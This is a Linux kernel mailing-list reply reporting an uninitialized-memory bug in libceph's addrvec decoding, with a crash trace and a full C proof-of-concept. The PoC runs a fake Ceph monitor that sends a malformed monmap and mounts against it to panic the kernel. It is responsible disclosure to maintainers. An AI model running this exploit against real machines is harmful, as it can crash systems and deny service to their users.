Re: [PATCH v3] libceph: tolerate addrvecs with multiple entries of the same type

From: XIAO WU

Date: Sat Jun 20 2026 - 21:29:54 EST


Hi Kefu,

I came across a Sashiko AI code review [1] that flagged a pre-existing
uninitialized-memory issue in `ceph_decode_entity_addrvec()`.  When the
addrvec has zero entries (`addr_cnt == 0`), the function returns 0
without writing to `*addr`.  Callers such as `ceph_monmap_decode()`
pass in address structs that live in `kmalloc_flex()` memory, which is
not zeroed, and then go on to use them as if they had been filled in.

I was able to reproduce this in QEMU by running a fake Ceph monitor that
sends a monmap with an empty addrvec.  With `panic_on_warn=1`, the
kernel hits a WARNING in `ceph_con_v1_try_read()` and panics.

On Thu, Jun 11, 2026 at 07:32:51PM +0800, Kefu Chai wrote:
> ceph_decode_entity_addrvec() currently rejects any addrvec containing
> more than one entry that matches the requested msgr type...

Your patch correctly tolerates duplicate entries, but the function still
returns success without touching `*addr` when `addr_cnt == 0`:

```c
// net/ceph/decode.c: ceph_decode_entity_addrvec()
if (!addr_cnt)
    return 0;  // *addr is still uninitialized
if (addr_cnt == 1 && !memchr_inv(&tmp_addr, 0, sizeof(tmp_addr)))
    return 0;  // same
```

Callers whose `*addr` lives in non-zeroed, dynamically allocated memory then end up using stale heap contents:

```c
// net/ceph/mon_client.c: ceph_monmap_decode()
mon_inst = kmalloc_flex(..., num_mon, sizeof(*mon_inst));
// ...
ceph_decode_entity_addrvec(p, end, msgr2, &mon_inst[i].addr);
// mon_inst[i].addr may be uninitialized if addrvec was empty
```

[Reproduction]

I set up a fake Ceph v1 monitor on localhost that sends a monmap
containing a monitor entry with an empty addrvec (addr_cnt=0). Mounting
the Ceph filesystem against it triggers the monmap decode path, causing
the client to attempt a connection with the uninitialized address.

[Crash — kernel 7.1.0-rc6, panic_on_warn=1]

  con->v1.connect_seq != le32_to_cpu(con->v1.in_reply.connect_seq)
  WARNING: net/ceph/messenger_v1.c:901 at ceph_con_v1_try_read+0x59f7/0x7020

  RIP: 0010:ceph_con_v1_try_read+0x59f7/0x7020
  Call Trace:
   <TASK>
   ceph_con_workfn+0xa04/0x13c0
   process_one_work+0xa20/0x1c50
   worker_thread+0x6df/0xf30
   kthread+0x387/0x4a0
   ret_from_fork+0xb2c/0xdd0
   </TASK>

  Kernel panic - not syncing: kernel: panic_on_warn set ...

Full PoC source (poc.c):
---8<----------------------------------------------------------------
/*
 * PoC: Uninitialized memory in ceph_decode_entity_addrvec()
 * Compile: gcc -static -o poc poc.c
 * Run: ./poc [port]
 */
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/mount.h>
#include <sys/wait.h>
#include <sys/stat.h>
#include <sys/poll.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <stdint.h>
#include <errno.h>
#include <fcntl.h>

#define BANNER "ceph v027"
#define BNR 9
#define ADR 136
#define CBNR (BNR+ADR)
#define SBNR (BNR+2*ADR)

#define TAG_RDY 1
#define TAG_MSG 7
#define MON_MAP 4
#define ENT_MON 1

#define MSZ 16384

/* Short aliases for the fixed-width unsigned types used throughout the PoC. */
typedef uint8_t  u8;
typedef uint16_t u16;
typedef uint32_t u32;
typedef uint64_t u64;

/* Byte-indexed lookup table for the reflected polynomial 0x82F63B78. */
static u32 ct[256];
/* Non-zero once ct[] has been filled in. */
static int ci;

/*
 * Fill ct[] on first use; later calls return immediately.
 * Must run before the first call to crc().
 */
static void ic(void)
{
    u32 byte;

    if (ci)
        return;

    for (byte = 0; byte < 256; byte++) {
        u32 rem = byte;
        int bit;

        /* Shift out one bit at a time, folding in the polynomial when the
         * bit that falls off is set. */
        for (bit = 0; bit < 8; bit++) {
            u32 carry = rem & 1;

            rem >>= 1;
            if (carry)
                rem ^= 0x82F63B78;
        }
        ct[byte] = rem;
    }
    ci = 1;
}

/*
 * Fold l bytes starting at b into the running checksum c and return the
 * updated value.  No initial or final inversion is applied here; the
 * caller supplies the seed and uses the result as-is.
 */
static u32 crc(u32 c, const u8 *b, int l)
{
    for (; l; l--, b++)
        c = (c >> 8) ^ ct[(c ^ *b) & 0xFF];
    return c;
}

/*
 * Little-endian store helpers: write the low 8/16/32/64 bits of v into the
 * byte buffer b, least-significant byte first.  W16, W32 and W64 evaluate
 * their arguments more than once, so pass side-effect-free expressions.
 */
#define W8(b,v)  ((b)[0] = (u8)(v))
#define W16(b,v) \
    ((b)[0] = (v) & 0xFF, \
     (b)[1] = ((v) >> 8) & 0xFF)
#define W32(b,v) \
    ((b)[0] = (v) & 0xFF, \
     (b)[1] = ((v) >> 8) & 0xFF, \
     (b)[2] = ((v) >> 16) & 0xFF, \
     (b)[3] = ((v) >> 24) & 0xFF)
#define W64(b,v) \
    do { \
        int _i; \
        for (_i = 0; _i < 8; _i++) \
            (b)[_i] = (u8)((u64)(v) >> (8 * _i)); \
    } while (0)

/* 64-bit value with only bit 23 set; mon() writes it into its handshake reply. */
#define REQ_FEAT (1ULL << 23)

/*
 * Read exactly l bytes from descriptor f into b.
 *
 * Waits up to 15 seconds for each chunk to become readable.  Returns 0 once
 * all l bytes have arrived, or -1 on poll timeout/error, read error, or
 * end-of-file before the buffer is full.
 */
static int rcv(int f, u8 *b, int l)
{
    u8 *dst = b;
    int left;

    for (left = l; left > 0; ) {
        struct pollfd pfd = { .fd = f, .events = POLLIN };
        int got;

        if (poll(&pfd, 1, 15000) <= 0)
            return -1;

        got = read(f, dst, left);
        if (got <= 0)
            return -1;

        dst += got;
        left -= got;
    }
    return 0;
}

/*
 * Write all l bytes of b to descriptor f, retrying after short writes.
 * Returns 0 when everything was written, -1 as soon as write() reports an
 * error or writes nothing.
 */
static int snd(int f, u8 *b, int l)
{
    u8 *src = b;
    int left;

    for (left = l; left > 0; ) {
        int put = write(f, src, left);

        if (put <= 0)
            return -1;

        src += put;
        left -= put;
    }
    return 0;
}

/*
 * Write a 5-byte record at b: one byte with value 2 followed by a 32-bit
 * little-endian zero.  The accompanying write-up describes this as an empty
 * addrvec (addr_cnt=0).  Returns the number of bytes written.
 */
static int ea(u8 *b)
{
    int n = 0;

    W8(b + n, 2);
    n += 1;
    W32(b + n, 0);
    n += 4;
    return n;
}

/*
 * Serialise the message payload into b and return its length in bytes.
 *
 * Layout in write order (all integers little-endian):
 *   u32   outer length          (patched at the end)
 *   u8 6, u8 1, u32 inner length (patched at the end)
 *   u64 0x42, u32 1
 *   two records of { u8 1, u8 1, u32 0 }
 *   u32 1
 *   u32 2, "m0"
 *   u8 1, u8 1, u32 entry length (patched at the end)
 *   u32 2, "m0"
 *   the 5 bytes produced by ea()
 *
 * NOTE(review): the inner and entry lengths count only the bytes that follow
 * their own length field, whereas the outer length also counts its own four
 * bytes.  Confirm against the decoder whether that difference is intended.
 */
static int pay(u8 *b)
{
    int off = 0;
    int outer_len_at, inner_len_at, inner_start;
    int entry_len_at, entry_start;

    /* Outer length placeholder. */
    outer_len_at = off;
    W32(b + off, 0);
    off += 4;

    /* Two version-like bytes, then the inner length placeholder. */
    W8(b + off, 6);
    off += 1;
    W8(b + off, 1);
    off += 1;
    inner_len_at = off;
    W32(b + off, 0);
    off += 4;
    inner_start = off;

    W64(b + off, 0x42);
    off += 8;
    W32(b + off, 1);
    off += 4;

    /* First { 1, 1, zero-length } record. */
    W8(b + off, 1);
    off += 1;
    W8(b + off, 1);
    off += 1;
    W32(b + off, 0);
    off += 4;

    /* Second { 1, 1, zero-length } record. */
    W8(b + off, 1);
    off += 1;
    W8(b + off, 1);
    off += 1;
    W32(b + off, 0);
    off += 4;

    W32(b + off, 1);
    off += 4;

    /* Length-prefixed string "m0". */
    W32(b + off, 2);
    off += 4;
    memcpy(b + off, "m0", 2);
    off += 2;

    /* Entry header: two bytes, then the entry length placeholder. */
    W8(b + off, 1);
    off += 1;
    W8(b + off, 1);
    off += 1;
    entry_len_at = off;
    W32(b + off, 0);
    off += 4;
    entry_start = off;

    /* Entry body: "m0" again, followed by the ea() record. */
    W32(b + off, 2);
    off += 4;
    memcpy(b + off, "m0", 2);
    off += 2;
    off += ea(b + off);

    /* Back-patch the three length fields now that the sizes are known. */
    W32(b + entry_len_at, off - entry_start);
    W32(b + inner_len_at, off - inner_start);
    W32(b + outer_len_at, off - outer_len_at);

    return off;
}

/* Bytes reserved for the zero-initialised header that follows the tag byte. */
#define HS 60
/* Bytes of zero-filled trailer appended after the payload. */
#define FS 13

/*
 * Build one complete message in b and return its total length:
 *   1 tag byte (TAG_MSG) + HS header bytes + pay() payload + FS zero bytes.
 *
 * s is stored as a 64-bit value at the start of the header.  The header's
 * first 56 bytes are checksummed with crc() (seed 0) and the result is
 * stored at header offset 56, so ic() must already have been called.
 *
 * NOTE(review): the remaining header offsets (16, 18, 20, 22, 36, 44) are
 * presumably the message type, priority, version, front length and source
 * entity fields of the wire header - confirm against the protocol definition.
 */
static int msg(u8 *b, u64 s)
{
    u8 *hdr = b + 1;
    u8 *body = hdr + HS;
    int plen;

    b[0] = TAG_MSG;
    memset(hdr, 0, HS);

    plen = pay(body);
    memset(body + plen, 0, FS);

    W64(hdr + 0, s);
    W16(hdr + 16, MON_MAP);
    W16(hdr + 18, 127);
    W16(hdr + 20, 1);
    W32(hdr + 22, plen);
    W64(hdr + 36, ENT_MON);
    W64(hdr + 44, 0);
    /* Checksum goes last so it covers every field written above. */
    W32(hdr + 56, crc(0, hdr, 56));

    return 1 + HS + plen + FS;
}

/*
 * Run a one-shot fake monitor on 127.0.0.1:pt.
 *
 * Sequence: listen, wait up to 60 s for one client, read the client's banner
 * block (CBNR bytes), answer with BANNER plus two zeroed address blobs, read
 * at least 26 further bytes from the client, reply with a 26-byte block
 * (TAG_RDY + REQ_FEAT), then send two messages built by msg() with sequence
 * numbers 1 and 2.
 *
 * Returns 0 when the whole exchange was sent, and also when no client
 * connected within the timeout (kept from the original behaviour).  Returns
 * -1 on any socket setup or I/O failure.
 *
 * Both descriptors start at -1 and are closed only when valid; the original
 * closed an uninitialised client descriptor when the listen poll timed out.
 */
static int mon(int pt)
{
    u8 b[MSZ];
    struct sockaddr_in a;
    int s = -1;
    int c = -1;
    int rc = -1;
    int one = 1;
    int got = 0;
    int ml;

    ic();

    s = socket(AF_INET, SOCK_STREAM, 0);
    if (s < 0)
        goto out;

    /* Best effort: only matters when the port was used very recently. */
    setsockopt(s, SOL_SOCKET, SO_REUSEADDR, &one, sizeof(one));

    memset(&a, 0, sizeof(a));
    a.sin_family = AF_INET;
    a.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
    a.sin_port = htons(pt);
    if (bind(s, (struct sockaddr *)&a, sizeof(a)) < 0)
        goto out;
    if (listen(s, 1) < 0)
        goto out;

    {
        struct pollfd lp = { .fd = s, .events = POLLIN };

        if (poll(&lp, 1, 60000) <= 0) {
            /* Nobody connected: the original reported 0 here. */
            rc = 0;
            goto out;
        }
    }

    c = accept(s, NULL, NULL);
    if (c < 0)
        goto out;

    /* Banner exchange: consume the client's block, reply with ours. */
    if (rcv(c, b, CBNR) < 0)
        goto out;
    memcpy(b, BANNER, BNR);
    memset(b + BNR, 0, 2 * ADR);
    if (snd(c, b, SBNR) < 0)
        goto out;

    /* Drain the client's next block; at least 26 bytes are required. */
    while (got < 26) {
        struct pollfd cp = { .fd = c, .events = POLLIN };
        int n;

        if (poll(&cp, 1, 10000) <= 0)
            goto out;
        n = read(c, b + got, MSZ - got);
        if (n <= 0)
            goto out;
        got += n;
    }

    /* 26-byte reply: tag byte, 64-bit feature word, remainder zero. */
    memset(b, 0, 26);
    W8(b, TAG_RDY);
    W64(b + 1, REQ_FEAT);
    if (snd(c, b, 26) < 0)
        goto out;
    usleep(300000);

    ml = msg(b, 1);
    if (snd(c, b, ml) < 0)
        goto out;
    usleep(500000);

    ml = msg(b, 2);
    if (snd(c, b, ml) < 0)
        goto out;

    rc = 0;
out:
    if (c >= 0)
        close(c);
    if (s >= 0)
        close(s);
    return rc;
}

/*
 * Entry point: ./poc [port]
 *
 * Forks a child that runs the fake monitor (mon()) on the given port
 * (default 16789), then mounts a ceph filesystem from 127.0.0.1:<port> at
 * /tmp/mnt in the parent so the kernel client talks to that monitor.  After
 * the child exits the mount point is force-unmounted and removed.
 *
 * Returns 1 if the port argument is not a decimal number in 1..65535 or if
 * fork() fails; otherwise 0.  A mount() failure is reported on stderr but
 * does not change the exit status.
 */
int main(int ac, char **av)
{
    long port = 16789;
    char src[64];
    pid_t pid;

    if (ac >= 2) {
        char *end;

        /* strtol instead of atoi so garbage and out-of-range ports are
         * rejected rather than silently turned into 0 or truncated. */
        errno = 0;
        port = strtol(av[1], &end, 10);
        if (errno != 0 || end == av[1] || *end != '\0' ||
            port < 1 || port > 65535) {
            fprintf(stderr, "usage: %s [port 1-65535]\n", av[0]);
            return 1;
        }
    }

    pid = fork();
    if (pid < 0) {
        perror("fork");
        return 1;
    }
    if (pid == 0) {
        mon((int)port);
        _exit(0);
    }

    /* Give the child time to reach listen() before mounting. */
    usleep(200000);

    mkdir("/tmp/mnt", 0700);
    snprintf(src, sizeof(src), "127.0.0.1:%ld:/", port);
    if (mount(src, "/tmp/mnt", "ceph", 0, "name=admin") < 0)
        perror("mount");

    waitpid(pid, NULL, 0);
    umount2("/tmp/mnt", MNT_FORCE);
    rmdir("/tmp/mnt");
    return 0;
}
---8<----------------------------------------------------------------
Compile: gcc -static -o poc poc.c

[1] https://sashiko.dev/#/patchset/20260611113251.2975975-1-k.chai%40proxmox.com
    (Sashiko AI code review — "Uninitialized Memory", Severity: High)

Thanks,
XIAOWU